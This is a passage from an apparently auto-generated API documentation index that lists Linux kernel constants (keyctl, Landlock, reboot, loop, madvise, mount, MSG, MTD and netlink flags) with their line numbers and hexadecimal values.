KEXEC_PRESERVE_CONTEXT = 0x2 constant KEXEC_SEGMENT_MAX (line 1705) | KEXEC_SEGMENT_MAX = 0x10 constant KEXEC_UPDATE_ELFCOREHDR (line 1706) | KEXEC_UPDATE_ELFCOREHDR = 0x4 constant KEYCTL_ASSUME_AUTHORITY (line 1707) | KEYCTL_ASSUME_AUTHORITY = 0x10 constant KEYCTL_CAPABILITIES (line 1708) | KEYCTL_CAPABILITIES = 0x1f constant KEYCTL_CAPS0_BIG_KEY (line 1709) | KEYCTL_CAPS0_BIG_KEY = 0x10 constant KEYCTL_CAPS0_CAPABILITIES (line 1710) | KEYCTL_CAPS0_CAPABILITIES = 0x1 constant KEYCTL_CAPS0_DIFFIE_HELLMAN (line 1711) | KEYCTL_CAPS0_DIFFIE_HELLMAN = 0x4 constant KEYCTL_CAPS0_INVALIDATE (line 1712) | KEYCTL_CAPS0_INVALIDATE = 0x20 constant KEYCTL_CAPS0_MOVE (line 1713) | KEYCTL_CAPS0_MOVE = 0x80 constant KEYCTL_CAPS0_PERSISTENT_KEYRINGS (line 1714) | KEYCTL_CAPS0_PERSISTENT_KEYRINGS = 0x2 constant KEYCTL_CAPS0_PUBLIC_KEY (line 1715) | KEYCTL_CAPS0_PUBLIC_KEY = 0x8 constant KEYCTL_CAPS0_RESTRICT_KEYRING (line 1716) | KEYCTL_CAPS0_RESTRICT_KEYRING = 0x40 constant KEYCTL_CAPS1_NOTIFICATIONS (line 1717) | KEYCTL_CAPS1_NOTIFICATIONS = 0x4 constant KEYCTL_CAPS1_NS_KEYRING_NAME (line 1718) | KEYCTL_CAPS1_NS_KEYRING_NAME = 0x1 constant KEYCTL_CAPS1_NS_KEY_TAG (line 1719) | KEYCTL_CAPS1_NS_KEY_TAG = 0x2 constant KEYCTL_CHOWN (line 1720) | KEYCTL_CHOWN = 0x4 constant KEYCTL_CLEAR (line 1721) | KEYCTL_CLEAR = 0x7 constant KEYCTL_DESCRIBE (line 1722) | KEYCTL_DESCRIBE = 0x6 constant KEYCTL_DH_COMPUTE (line 1723) | KEYCTL_DH_COMPUTE = 0x17 constant KEYCTL_GET_KEYRING_ID (line 1724) | KEYCTL_GET_KEYRING_ID = 0x0 constant KEYCTL_GET_PERSISTENT (line 1725) | KEYCTL_GET_PERSISTENT = 0x16 constant KEYCTL_GET_SECURITY (line 1726) | KEYCTL_GET_SECURITY = 0x11 constant KEYCTL_INSTANTIATE (line 1727) | KEYCTL_INSTANTIATE = 0xc constant KEYCTL_INSTANTIATE_IOV (line 1728) | KEYCTL_INSTANTIATE_IOV = 0x14 constant KEYCTL_INVALIDATE (line 1729) | KEYCTL_INVALIDATE = 0x15 constant KEYCTL_JOIN_SESSION_KEYRING (line 1730) | KEYCTL_JOIN_SESSION_KEYRING = 0x1 constant KEYCTL_LINK (line 1731) | KEYCTL_LINK = 0x8 constant KEYCTL_MOVE (line 1732) | KEYCTL_MOVE = 0x1e constant KEYCTL_MOVE_EXCL (line 1733) | KEYCTL_MOVE_EXCL = 0x1 constant KEYCTL_NEGATE (line 1734) | KEYCTL_NEGATE = 0xd constant KEYCTL_PKEY_DECRYPT (line 1735) | KEYCTL_PKEY_DECRYPT = 0x1a constant KEYCTL_PKEY_ENCRYPT (line 1736) | KEYCTL_PKEY_ENCRYPT = 0x19 constant KEYCTL_PKEY_QUERY (line 1737) | KEYCTL_PKEY_QUERY = 0x18 constant KEYCTL_PKEY_SIGN (line 1738) | KEYCTL_PKEY_SIGN = 0x1b constant KEYCTL_PKEY_VERIFY (line 1739) | KEYCTL_PKEY_VERIFY = 0x1c constant KEYCTL_READ (line 1740) | KEYCTL_READ = 0xb constant KEYCTL_REJECT (line 1741) | KEYCTL_REJECT = 0x13 constant KEYCTL_RESTRICT_KEYRING (line 1742) | KEYCTL_RESTRICT_KEYRING = 0x1d constant KEYCTL_REVOKE (line 1743) | KEYCTL_REVOKE = 0x3 constant KEYCTL_SEARCH (line 1744) | KEYCTL_SEARCH = 0xa constant KEYCTL_SESSION_TO_PARENT (line 1745) | KEYCTL_SESSION_TO_PARENT = 0x12 constant KEYCTL_SETPERM (line 1746) | KEYCTL_SETPERM = 0x5 constant KEYCTL_SET_REQKEY_KEYRING (line 1747) | KEYCTL_SET_REQKEY_KEYRING = 0xe constant KEYCTL_SET_TIMEOUT (line 1748) | KEYCTL_SET_TIMEOUT = 0xf constant KEYCTL_SUPPORTS_DECRYPT (line 1749) | KEYCTL_SUPPORTS_DECRYPT = 0x2 constant KEYCTL_SUPPORTS_ENCRYPT (line 1750) | KEYCTL_SUPPORTS_ENCRYPT = 0x1 constant KEYCTL_SUPPORTS_SIGN (line 1751) | KEYCTL_SUPPORTS_SIGN = 0x4 constant KEYCTL_SUPPORTS_VERIFY (line 1752) | KEYCTL_SUPPORTS_VERIFY = 0x8 constant KEYCTL_UNLINK (line 1753) | KEYCTL_UNLINK = 0x9 constant KEYCTL_UPDATE (line 1754) | KEYCTL_UPDATE = 0x2 constant KEYCTL_WATCH_KEY (line 1755) | KEYCTL_WATCH_KEY = 0x20 constant KEY_REQKEY_DEFL_DEFAULT (line 1756) | KEY_REQKEY_DEFL_DEFAULT = 0x0 constant KEY_REQKEY_DEFL_GROUP_KEYRING (line 1757) | KEY_REQKEY_DEFL_GROUP_KEYRING = 0x6 constant KEY_REQKEY_DEFL_NO_CHANGE (line 1758) | KEY_REQKEY_DEFL_NO_CHANGE = -0x1 constant KEY_REQKEY_DEFL_PROCESS_KEYRING (line 1759) | KEY_REQKEY_DEFL_PROCESS_KEYRING = 0x2 constant KEY_REQKEY_DEFL_REQUESTOR_KEYRING (line 1760) | KEY_REQKEY_DEFL_REQUESTOR_KEYRING = 0x7 constant KEY_REQKEY_DEFL_SESSION_KEYRING (line 1761) | KEY_REQKEY_DEFL_SESSION_KEYRING = 0x3 constant KEY_REQKEY_DEFL_THREAD_KEYRING (line 1762) | KEY_REQKEY_DEFL_THREAD_KEYRING = 0x1 constant KEY_REQKEY_DEFL_USER_KEYRING (line 1763) | KEY_REQKEY_DEFL_USER_KEYRING = 0x4 constant KEY_REQKEY_DEFL_USER_SESSION_KEYRING (line 1764) | KEY_REQKEY_DEFL_USER_SESSION_KEYRING = 0x5 constant KEY_SPEC_GROUP_KEYRING (line 1765) | KEY_SPEC_GROUP_KEYRING = -0x6 constant KEY_SPEC_PROCESS_KEYRING (line 1766) | KEY_SPEC_PROCESS_KEYRING = -0x2 constant KEY_SPEC_REQKEY_AUTH_KEY (line 1767) | KEY_SPEC_REQKEY_AUTH_KEY = -0x7 constant KEY_SPEC_REQUESTOR_KEYRING (line 1768) | KEY_SPEC_REQUESTOR_KEYRING = -0x8 constant KEY_SPEC_SESSION_KEYRING (line 1769) | KEY_SPEC_SESSION_KEYRING = -0x3 constant KEY_SPEC_THREAD_KEYRING (line 1770) | KEY_SPEC_THREAD_KEYRING = -0x1 constant KEY_SPEC_USER_KEYRING (line 1771) | KEY_SPEC_USER_KEYRING = -0x4 constant KEY_SPEC_USER_SESSION_KEYRING (line 1772) | KEY_SPEC_USER_SESSION_KEYRING = -0x5 constant LANDLOCK_ACCESS_FS_EXECUTE (line 1773) | LANDLOCK_ACCESS_FS_EXECUTE = 0x1 constant LANDLOCK_ACCESS_FS_MAKE_BLOCK (line 1774) | LANDLOCK_ACCESS_FS_MAKE_BLOCK = 0x800 constant LANDLOCK_ACCESS_FS_MAKE_CHAR (line 1775) | LANDLOCK_ACCESS_FS_MAKE_CHAR = 0x40 constant LANDLOCK_ACCESS_FS_MAKE_DIR (line 1776) | LANDLOCK_ACCESS_FS_MAKE_DIR = 0x80 constant LANDLOCK_ACCESS_FS_MAKE_FIFO (line 1777) | LANDLOCK_ACCESS_FS_MAKE_FIFO = 0x400 constant LANDLOCK_ACCESS_FS_MAKE_REG (line 1778) | LANDLOCK_ACCESS_FS_MAKE_REG = 0x100 constant LANDLOCK_ACCESS_FS_MAKE_SOCK (line 1779) | LANDLOCK_ACCESS_FS_MAKE_SOCK = 0x200 constant LANDLOCK_ACCESS_FS_MAKE_SYM (line 1780) | LANDLOCK_ACCESS_FS_MAKE_SYM = 0x1000 constant LANDLOCK_ACCESS_FS_READ_DIR (line 1781) | LANDLOCK_ACCESS_FS_READ_DIR = 0x8 constant LANDLOCK_ACCESS_FS_READ_FILE (line 1782) | LANDLOCK_ACCESS_FS_READ_FILE = 0x4 constant LANDLOCK_ACCESS_FS_REFER (line 1783) | LANDLOCK_ACCESS_FS_REFER = 0x2000 constant LANDLOCK_ACCESS_FS_REMOVE_DIR (line 1784) | LANDLOCK_ACCESS_FS_REMOVE_DIR = 0x10 constant LANDLOCK_ACCESS_FS_REMOVE_FILE (line 1785) | LANDLOCK_ACCESS_FS_REMOVE_FILE = 0x20 constant LANDLOCK_ACCESS_FS_TRUNCATE (line 1786) | LANDLOCK_ACCESS_FS_TRUNCATE = 0x4000 constant LANDLOCK_ACCESS_FS_WRITE_FILE (line 1787) | LANDLOCK_ACCESS_FS_WRITE_FILE = 0x2 constant LANDLOCK_ACCESS_NET_BIND_TCP (line 1788) | LANDLOCK_ACCESS_NET_BIND_TCP = 0x1 constant LANDLOCK_ACCESS_NET_CONNECT_TCP (line 1789) | LANDLOCK_ACCESS_NET_CONNECT_TCP = 0x2 constant LANDLOCK_CREATE_RULESET_VERSION (line 1790) | LANDLOCK_CREATE_RULESET_VERSION = 0x1 constant LINUX_REBOOT_CMD_CAD_OFF (line 1791) | LINUX_REBOOT_CMD_CAD_OFF = 0x0 constant LINUX_REBOOT_CMD_CAD_ON (line 1792) | LINUX_REBOOT_CMD_CAD_ON = 0x89abcdef constant LINUX_REBOOT_CMD_HALT (line 1793) | LINUX_REBOOT_CMD_HALT = 0xcdef0123 constant LINUX_REBOOT_CMD_KEXEC (line 1794) | LINUX_REBOOT_CMD_KEXEC = 0x45584543 constant LINUX_REBOOT_CMD_POWER_OFF (line 1795) | LINUX_REBOOT_CMD_POWER_OFF = 0x4321fedc constant LINUX_REBOOT_CMD_RESTART (line 1796) | LINUX_REBOOT_CMD_RESTART = 0x1234567 constant LINUX_REBOOT_CMD_RESTART2 (line 1797) | LINUX_REBOOT_CMD_RESTART2 = 0xa1b2c3d4 constant LINUX_REBOOT_CMD_SW_SUSPEND (line 1798) | LINUX_REBOOT_CMD_SW_SUSPEND = 0xd000fce2 constant LINUX_REBOOT_MAGIC1 (line 1799) | LINUX_REBOOT_MAGIC1 = 0xfee1dead constant LINUX_REBOOT_MAGIC2 (line 1800) | LINUX_REBOOT_MAGIC2 = 0x28121969 constant LOCK_EX (line 1801) | LOCK_EX = 0x2 constant LOCK_NB (line 1802) | LOCK_NB = 0x4 constant LOCK_SH (line 1803) | LOCK_SH = 0x1 constant LOCK_UN (line 1804) | LOCK_UN = 0x8 constant LOOP_CLR_FD (line 1805) | LOOP_CLR_FD = 0x4c01 constant LOOP_CONFIGURE (line 1806) | LOOP_CONFIGURE = 0x4c0a constant LOOP_CTL_ADD (line 1807) | LOOP_CTL_ADD = 0x4c80 constant LOOP_CTL_GET_FREE (line 1808) | LOOP_CTL_GET_FREE = 0x4c82 constant LOOP_CTL_REMOVE (line 1809) | LOOP_CTL_REMOVE = 0x4c81 constant LOOP_GET_STATUS (line 1810) | LOOP_GET_STATUS = 0x4c03 constant LOOP_GET_STATUS64 (line 1811) | LOOP_GET_STATUS64 = 0x4c05 constant LOOP_SET_BLOCK_SIZE (line 1812) | LOOP_SET_BLOCK_SIZE = 0x4c09 constant LOOP_SET_CAPACITY (line 1813) | LOOP_SET_CAPACITY = 0x4c07 constant LOOP_SET_DIRECT_IO (line 1814) | LOOP_SET_DIRECT_IO = 0x4c08 constant LOOP_SET_FD (line 1815) | LOOP_SET_FD = 0x4c00 constant LOOP_SET_STATUS (line 1816) | LOOP_SET_STATUS = 0x4c02 constant LOOP_SET_STATUS64 (line 1817) | LOOP_SET_STATUS64 = 0x4c04 constant LOOP_SET_STATUS_CLEARABLE_FLAGS (line 1818) | LOOP_SET_STATUS_CLEARABLE_FLAGS = 0x4 constant LOOP_SET_STATUS_SETTABLE_FLAGS (line 1819) | LOOP_SET_STATUS_SETTABLE_FLAGS = 0xc constant LO_KEY_SIZE (line 1820) | LO_KEY_SIZE = 0x20 constant LO_NAME_SIZE (line 1821) | LO_NAME_SIZE = 0x40 constant LWTUNNEL_IP6_MAX (line 1822) | LWTUNNEL_IP6_MAX = 0x8 constant LWTUNNEL_IP_MAX (line 1823) | LWTUNNEL_IP_MAX = 0x8 constant LWTUNNEL_IP_OPTS_MAX (line 1824) | LWTUNNEL_IP_OPTS_MAX = 0x3 constant LWTUNNEL_IP_OPT_ERSPAN_MAX (line 1825) | LWTUNNEL_IP_OPT_ERSPAN_MAX = 0x4 constant LWTUNNEL_IP_OPT_GENEVE_MAX (line 1826) | LWTUNNEL_IP_OPT_GENEVE_MAX = 0x3 constant LWTUNNEL_IP_OPT_VXLAN_MAX (line 1827) | LWTUNNEL_IP_OPT_VXLAN_MAX = 0x1 constant MADV_COLD (line 1828) | MADV_COLD = 0x14 constant MADV_COLLAPSE (line 1829) | MADV_COLLAPSE = 0x19 constant MADV_DODUMP (line 1830) | MADV_DODUMP = 0x11 constant MADV_DOFORK (line 1831) | MADV_DOFORK = 0xb constant MADV_DONTDUMP (line 1832) | MADV_DONTDUMP = 0x10 constant MADV_DONTFORK (line 1833) | MADV_DONTFORK = 0xa constant MADV_DONTNEED (line 1834) | MADV_DONTNEED = 0x4 constant MADV_DONTNEED_LOCKED (line 1835) | MADV_DONTNEED_LOCKED = 0x18 constant MADV_FREE (line 1836) | MADV_FREE = 0x8 constant MADV_HUGEPAGE (line 1837) | MADV_HUGEPAGE = 0xe constant MADV_HWPOISON (line 1838) | MADV_HWPOISON = 0x64 constant MADV_KEEPONFORK (line 1839) | MADV_KEEPONFORK = 0x13 constant MADV_MERGEABLE (line 1840) | MADV_MERGEABLE = 0xc constant MADV_NOHUGEPAGE (line 1841) | MADV_NOHUGEPAGE = 0xf constant MADV_NORMAL (line 1842) | MADV_NORMAL = 0x0 constant MADV_PAGEOUT (line 1843) | MADV_PAGEOUT = 0x15 constant MADV_POPULATE_READ (line 1844) | MADV_POPULATE_READ = 0x16 constant MADV_POPULATE_WRITE (line 1845) | MADV_POPULATE_WRITE = 0x17 constant MADV_RANDOM (line 1846) | MADV_RANDOM = 0x1 constant MADV_REMOVE (line 1847) | MADV_REMOVE = 0x9 constant MADV_SEQUENTIAL (line 1848) | MADV_SEQUENTIAL = 0x2 constant MADV_UNMERGEABLE (line 1849) | MADV_UNMERGEABLE = 0xd constant MADV_WILLNEED (line 1850) | MADV_WILLNEED = 0x3 constant MADV_WIPEONFORK (line 1851) | MADV_WIPEONFORK = 0x12 constant MAP_FILE (line 1852) | MAP_FILE = 0x0 constant MAP_FIXED (line 1853) | MAP_FIXED = 0x10 constant MAP_FIXED_NOREPLACE (line 1854) | MAP_FIXED_NOREPLACE = 0x100000 constant MAP_HUGE_MASK (line 1855) | MAP_HUGE_MASK = 0x3f constant MAP_HUGE_SHIFT (line 1856) | MAP_HUGE_SHIFT = 0x1a constant MAP_PRIVATE (line 1857) | MAP_PRIVATE = 0x2 constant MAP_SHARED (line 1858) | MAP_SHARED = 0x1 constant MAP_SHARED_VALIDATE (line 1859) | MAP_SHARED_VALIDATE = 0x3 constant MAP_TYPE (line 1860) | MAP_TYPE = 0xf constant MCAST_BLOCK_SOURCE (line 1861) | MCAST_BLOCK_SOURCE = 0x2b constant MCAST_EXCLUDE (line 1862) | MCAST_EXCLUDE = 0x0 constant MCAST_INCLUDE (line 1863) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 1864) | MCAST_JOIN_GROUP = 0x2a constant MCAST_JOIN_SOURCE_GROUP (line 1865) | MCAST_JOIN_SOURCE_GROUP = 0x2e constant MCAST_LEAVE_GROUP (line 1866) | MCAST_LEAVE_GROUP = 0x2d constant MCAST_LEAVE_SOURCE_GROUP (line 1867) | MCAST_LEAVE_SOURCE_GROUP = 0x2f constant MCAST_MSFILTER (line 1868) | MCAST_MSFILTER = 0x30 constant MCAST_UNBLOCK_SOURCE (line 1869) | MCAST_UNBLOCK_SOURCE = 0x2c constant MEMGETREGIONINFO (line 1870) | MEMGETREGIONINFO = 0xc0104d08 constant MEMREADOOB64 (line 1871) | MEMREADOOB64 = 0xc0184d16 constant MEMWRITE (line 1872) | MEMWRITE = 0xc0304d18 constant MEMWRITEOOB64 (line 1873) | MEMWRITEOOB64 = 0xc0184d15 constant MFD_ALLOW_SEALING (line 1874) | MFD_ALLOW_SEALING = 0x2 constant MFD_CLOEXEC (line 1875) | MFD_CLOEXEC = 0x1 constant MFD_EXEC (line 1876) | MFD_EXEC = 0x10 constant MFD_HUGETLB (line 1877) | MFD_HUGETLB = 0x4 constant MFD_HUGE_16GB (line 1878) | MFD_HUGE_16GB = 0x88000000 constant MFD_HUGE_16MB (line 1879) | MFD_HUGE_16MB = 0x60000000 constant MFD_HUGE_1GB (line 1880) | MFD_HUGE_1GB = 0x78000000 constant MFD_HUGE_1MB (line 1881) | MFD_HUGE_1MB = 0x50000000 constant MFD_HUGE_256MB (line 1882) | MFD_HUGE_256MB = 0x70000000 constant MFD_HUGE_2GB (line 1883) | MFD_HUGE_2GB = 0x7c000000 constant MFD_HUGE_2MB (line 1884) | MFD_HUGE_2MB = 0x54000000 constant MFD_HUGE_32MB (line 1885) | MFD_HUGE_32MB = 0x64000000 constant MFD_HUGE_512KB (line 1886) | MFD_HUGE_512KB = 0x4c000000 constant MFD_HUGE_512MB (line 1887) | MFD_HUGE_512MB = 0x74000000 constant MFD_HUGE_64KB (line 1888) | MFD_HUGE_64KB = 0x40000000 constant MFD_HUGE_8MB (line 1889) | MFD_HUGE_8MB = 0x5c000000 constant MFD_HUGE_MASK (line 1890) | MFD_HUGE_MASK = 0x3f constant MFD_HUGE_SHIFT (line 1891) | MFD_HUGE_SHIFT = 0x1a constant MFD_NOEXEC_SEAL (line 1892) | MFD_NOEXEC_SEAL = 0x8 constant MINIX2_SUPER_MAGIC (line 1893) | MINIX2_SUPER_MAGIC = 0x2468 constant MINIX2_SUPER_MAGIC2 (line 1894) | MINIX2_SUPER_MAGIC2 = 0x2478 constant MINIX3_SUPER_MAGIC (line 1895) | MINIX3_SUPER_MAGIC = 0x4d5a constant MINIX_SUPER_MAGIC (line 1896) | MINIX_SUPER_MAGIC = 0x137f constant MINIX_SUPER_MAGIC2 (line 1897) | MINIX_SUPER_MAGIC2 = 0x138f constant MNT_DETACH (line 1898) | MNT_DETACH = 0x2 constant MNT_EXPIRE (line 1899) | MNT_EXPIRE = 0x4 constant MNT_FORCE (line 1900) | MNT_FORCE = 0x1 constant MODULE_INIT_COMPRESSED_FILE (line 1901) | MODULE_INIT_COMPRESSED_FILE = 0x4 constant MODULE_INIT_IGNORE_MODVERSIONS (line 1902) | MODULE_INIT_IGNORE_MODVERSIONS = 0x1 constant MODULE_INIT_IGNORE_VERMAGIC (line 1903) | MODULE_INIT_IGNORE_VERMAGIC = 0x2 constant MOUNT_ATTR_IDMAP (line 1904) | MOUNT_ATTR_IDMAP = 0x100000 constant MOUNT_ATTR_NOATIME (line 1905) | MOUNT_ATTR_NOATIME = 0x10 constant MOUNT_ATTR_NODEV (line 1906) | MOUNT_ATTR_NODEV = 0x4 constant MOUNT_ATTR_NODIRATIME (line 1907) | MOUNT_ATTR_NODIRATIME = 0x80 constant MOUNT_ATTR_NOEXEC (line 1908) | MOUNT_ATTR_NOEXEC = 0x8 constant MOUNT_ATTR_NOSUID (line 1909) | MOUNT_ATTR_NOSUID = 0x2 constant MOUNT_ATTR_NOSYMFOLLOW (line 1910) | MOUNT_ATTR_NOSYMFOLLOW = 0x200000 constant MOUNT_ATTR_RDONLY (line 1911) | MOUNT_ATTR_RDONLY = 0x1 constant MOUNT_ATTR_RELATIME (line 1912) | MOUNT_ATTR_RELATIME = 0x0 constant MOUNT_ATTR_SIZE_VER0 (line 1913) | MOUNT_ATTR_SIZE_VER0 = 0x20 constant MOUNT_ATTR_STRICTATIME (line 1914) | MOUNT_ATTR_STRICTATIME = 0x20 constant MOUNT_ATTR__ATIME (line 1915) | MOUNT_ATTR__ATIME = 0x70 constant MREMAP_DONTUNMAP (line 1916) | MREMAP_DONTUNMAP = 0x4 constant MREMAP_FIXED (line 1917) | MREMAP_FIXED = 0x2 constant MREMAP_MAYMOVE (line 1918) | MREMAP_MAYMOVE = 0x1 constant MSDOS_SUPER_MAGIC (line 1919) | MSDOS_SUPER_MAGIC = 0x4d44 constant MSG_BATCH (line 1920) | MSG_BATCH = 0x40000 constant MSG_CMSG_CLOEXEC (line 1921) | MSG_CMSG_CLOEXEC = 0x40000000 constant MSG_CONFIRM (line 1922) | MSG_CONFIRM = 0x800 constant MSG_CTRUNC (line 1923) | MSG_CTRUNC = 0x8 constant MSG_DONTROUTE (line 1924) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1925) | MSG_DONTWAIT = 0x40 constant MSG_EOR (line 1926) | MSG_EOR = 0x80 constant MSG_ERRQUEUE (line 1927) | MSG_ERRQUEUE = 0x2000 constant MSG_FASTOPEN (line 1928) | MSG_FASTOPEN = 0x20000000 constant MSG_FIN (line 1929) | MSG_FIN = 0x200 constant MSG_MORE (line 1930) | MSG_MORE = 0x8000 constant MSG_NOSIGNAL (line 1931) | MSG_NOSIGNAL = 0x4000 constant MSG_OOB (line 1932) | MSG_OOB = 0x1 constant MSG_PEEK (line 1933) | MSG_PEEK = 0x2 constant MSG_PROXY (line 1934) | MSG_PROXY = 0x10 constant MSG_RST (line 1935) | MSG_RST = 0x1000 constant MSG_SYN (line 1936) | MSG_SYN = 0x400 constant MSG_TRUNC (line 1937) | MSG_TRUNC = 0x20 constant MSG_TRYHARD (line 1938) | MSG_TRYHARD = 0x4 constant MSG_WAITALL (line 1939) | MSG_WAITALL = 0x100 constant MSG_WAITFORONE (line 1940) | MSG_WAITFORONE = 0x10000 constant MSG_ZEROCOPY (line 1941) | MSG_ZEROCOPY = 0x4000000 constant MS_ACTIVE (line 1942) | MS_ACTIVE = 0x40000000 constant MS_ASYNC (line 1943) | MS_ASYNC = 0x1 constant MS_BIND (line 1944) | MS_BIND = 0x1000 constant MS_BORN (line 1945) | MS_BORN = 0x20000000 constant MS_DIRSYNC (line 1946) | MS_DIRSYNC = 0x80 constant MS_INVALIDATE (line 1947) | MS_INVALIDATE = 0x2 constant MS_I_VERSION (line 1948) | MS_I_VERSION = 0x800000 constant MS_KERNMOUNT (line 1949) | MS_KERNMOUNT = 0x400000 constant MS_LAZYTIME (line 1950) | MS_LAZYTIME = 0x2000000 constant MS_MANDLOCK (line 1951) | MS_MANDLOCK = 0x40 constant MS_MGC_MSK (line 1952) | MS_MGC_MSK = 0xffff0000 constant MS_MGC_VAL (line 1953) | MS_MGC_VAL = 0xc0ed0000 constant MS_MOVE (line 1954) | MS_MOVE = 0x2000 constant MS_NOATIME (line 1955) | MS_NOATIME = 0x400 constant MS_NODEV (line 1956) | MS_NODEV = 0x4 constant MS_NODIRATIME (line 1957) | MS_NODIRATIME = 0x800 constant MS_NOEXEC (line 1958) | MS_NOEXEC = 0x8 constant MS_NOREMOTELOCK (line 1959) | MS_NOREMOTELOCK = 0x8000000 constant MS_NOSEC (line 1960) | MS_NOSEC = 0x10000000 constant MS_NOSUID (line 1961) | MS_NOSUID = 0x2 constant MS_NOSYMFOLLOW (line 1962) | MS_NOSYMFOLLOW = 0x100 constant MS_NOUSER (line 1963) | MS_NOUSER = -0x80000000 constant MS_POSIXACL (line 1964) | MS_POSIXACL = 0x10000 constant MS_PRIVATE (line 1965) | MS_PRIVATE = 0x40000 constant MS_RDONLY (line 1966) | MS_RDONLY = 0x1 constant MS_REC (line 1967) | MS_REC = 0x4000 constant MS_RELATIME (line 1968) | MS_RELATIME = 0x200000 constant MS_REMOUNT (line 1969) | MS_REMOUNT = 0x20 constant MS_RMT_MASK (line 1970) | MS_RMT_MASK = 0x2800051 constant MS_SHARED (line 1971) | MS_SHARED = 0x100000 constant MS_SILENT (line 1972) | MS_SILENT = 0x8000 constant MS_SLAVE (line 1973) | MS_SLAVE = 0x80000 constant MS_STRICTATIME (line 1974) | MS_STRICTATIME = 0x1000000 constant MS_SUBMOUNT (line 1975) | MS_SUBMOUNT = 0x4000000 constant MS_SYNC (line 1976) | MS_SYNC = 0x4 constant MS_SYNCHRONOUS (line 1977) | MS_SYNCHRONOUS = 0x10 constant MS_UNBINDABLE (line 1978) | MS_UNBINDABLE = 0x20000 constant MS_VERBOSE (line 1979) | MS_VERBOSE = 0x8000 constant MTD_ABSENT (line 1980) | MTD_ABSENT = 0x0 constant MTD_BIT_WRITEABLE (line 1981) | MTD_BIT_WRITEABLE = 0x800 constant MTD_CAP_NANDFLASH (line 1982) | MTD_CAP_NANDFLASH = 0x400 constant MTD_CAP_NORFLASH (line 1983) | MTD_CAP_NORFLASH = 0xc00 constant MTD_CAP_NVRAM (line 1984) | MTD_CAP_NVRAM = 0x1c00 constant MTD_CAP_RAM (line 1985) | MTD_CAP_RAM = 0x1c00 constant MTD_CAP_ROM (line 1986) | MTD_CAP_ROM = 0x0 constant MTD_DATAFLASH (line 1987) | MTD_DATAFLASH = 0x6 constant MTD_INODE_FS_MAGIC (line 1988) | MTD_INODE_FS_MAGIC = 0x11307854 constant MTD_MAX_ECCPOS_ENTRIES (line 1989) | MTD_MAX_ECCPOS_ENTRIES = 0x40 constant MTD_MAX_OOBFREE_ENTRIES (line 1990) | MTD_MAX_OOBFREE_ENTRIES = 0x8 constant MTD_MLCNANDFLASH (line 1991) | MTD_MLCNANDFLASH = 0x8 constant MTD_NANDECC_AUTOPLACE (line 1992) | MTD_NANDECC_AUTOPLACE = 0x2 constant MTD_NANDECC_AUTOPL_USR (line 1993) | MTD_NANDECC_AUTOPL_USR = 0x4 constant MTD_NANDECC_OFF (line 1994) | MTD_NANDECC_OFF = 0x0 constant MTD_NANDECC_PLACE (line 1995) | MTD_NANDECC_PLACE = 0x1 constant MTD_NANDECC_PLACEONLY (line 1996) | MTD_NANDECC_PLACEONLY = 0x3 constant MTD_NANDFLASH (line 1997) | MTD_NANDFLASH = 0x4 constant MTD_NORFLASH (line 1998) | MTD_NORFLASH = 0x3 constant MTD_NO_ERASE (line 1999) | MTD_NO_ERASE = 0x1000 constant MTD_OTP_FACTORY (line 2000) | MTD_OTP_FACTORY = 0x1 constant MTD_OTP_OFF (line 2001) | MTD_OTP_OFF = 0x0 constant MTD_OTP_USER (line 2002) | MTD_OTP_USER = 0x2 constant MTD_POWERUP_LOCK (line 2003) | MTD_POWERUP_LOCK = 0x2000 constant MTD_RAM (line 2004) | MTD_RAM = 0x1 constant MTD_ROM (line 2005) | MTD_ROM = 0x2 constant MTD_SLC_ON_MLC_EMULATION (line 2006) | MTD_SLC_ON_MLC_EMULATION = 0x4000 constant MTD_UBIVOLUME (line 2007) | MTD_UBIVOLUME = 0x7 constant MTD_WRITEABLE (line 2008) | MTD_WRITEABLE = 0x400 constant NAME_MAX (line 2009) | NAME_MAX = 0xff constant NCP_SUPER_MAGIC (line 2010) | NCP_SUPER_MAGIC = 0x564c constant NETLINK_ADD_MEMBERSHIP (line 2011) | NETLINK_ADD_MEMBERSHIP = 0x1 constant NETLINK_AUDIT (line 2012) | NETLINK_AUDIT = 0x9 constant NETLINK_BROADCAST_ERROR (line 2013) | NETLINK_BROADCAST_ERROR = 0x4 constant NETLINK_CAP_ACK (line 2014) | NETLINK_CAP_ACK = 0xa constant NETLINK_CONNECTOR (line 2015) | NETLINK_CONNECTOR = 0xb constant NETLINK_CRYPTO (line 2016) | NETLINK_CRYPTO = 0x15 constant NETLINK_DNRTMSG (line 2017) | NETLINK_DNRTMSG = 0xe constant NETLINK_DROP_MEMBERSHIP (line 2018) | NETLINK_DROP_MEMBERSHIP = 0x2 constant NETLINK_ECRYPTFS (line 2019) | NETLINK_ECRYPTFS = 0x13 constant NETLINK_EXT_ACK (line 2020) | NETLINK_EXT_ACK = 0xb constant NETLINK_FIB_LOOKUP (line 2021) | NETLINK_FIB_LOOKUP = 0xa constant NETLINK_FIREWALL (line 2022) | NETLINK_FIREWALL = 0x3 constant NETLINK_GENERIC (line 2023) | NETLINK_GENERIC = 0x10 constant NETLINK_GET_STRICT_CHK (line 2024) | NETLINK_GET_STRICT_CHK = 0xc constant NETLINK_INET_DIAG (line 2025) | NETLINK_INET_DIAG = 0x4 constant NETLINK_IP6_FW (line 2026) | NETLINK_IP6_FW = 0xd constant NETLINK_ISCSI (line 2027) | NETLINK_ISCSI = 0x8 constant NETLINK_KOBJECT_UEVENT (line 2028) | NETLINK_KOBJECT_UEVENT = 0xf constant NETLINK_LISTEN_ALL_NSID (line 2029) | NETLINK_LISTEN_ALL_NSID = 0x8 constant NETLINK_LIST_MEMBERSHIPS (line 2030) | NETLINK_LIST_MEMBERSHIPS = 0x9 constant NETLINK_NETFILTER (line 2031) | NETLINK_NETFILTER = 0xc constant NETLINK_NFLOG (line 2032) | NETLINK_NFLOG = 0x5 constant NETLINK_NO_ENOBUFS (line 2033) | NETLINK_NO_ENOBUFS = 0x5 constant NETLINK_PKTINFO (line 2034) | NETLINK_PKTINFO = 0x3 constant NETLINK_RDMA (line 2035) | NETLINK_RDMA = 0x14 constant NETLINK_ROUTE (line 2036) | NETLINK_ROUTE = 0x0 constant NETLINK_RX_RING (line 2037) | NETLINK_RX_RING = 0x6 constant NETLINK_SCSITRANSPORT (line 2038) | NETLINK_SCSITRANSPORT = 0x12 constant NETLINK_SELINUX (line 2039) | NETLINK_SELINUX = 0x7 constant NETLINK_SMC (line 2040) | NETLINK_SMC = 0x16 constant 